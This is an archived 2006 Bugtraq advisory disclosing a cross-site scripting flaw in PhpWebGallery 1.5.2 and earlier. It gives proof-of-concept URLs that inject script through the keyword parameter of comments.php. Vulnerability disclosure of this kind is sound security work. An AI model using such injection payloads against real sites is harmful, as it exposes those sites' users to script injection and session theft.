NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 2006-07

PhpWebGallery Cross Site Scripting Vulnerability

iss4m.hgmail.com
Date: Mon Jul 03 2006 - 19:00:03 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Produce : PhpWebGallery <= 1.5.2
Site : http://www.phpwebgallery.net
Problem : XSS
Greetz : hasnaa and all friends

Moroccan Security Research Team

Vulnerable file : comments.php

Exploit :

http://localhost/phpwebgallery/comments.php?keyword=%22%3E[XSS]

http://localhost/phpwebgallery/comments.php?keyword=%22%3E%3Cscript%3Ealert('Hi+Master');%3C/script%3E

Contact : iss4m.hgmail.com

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]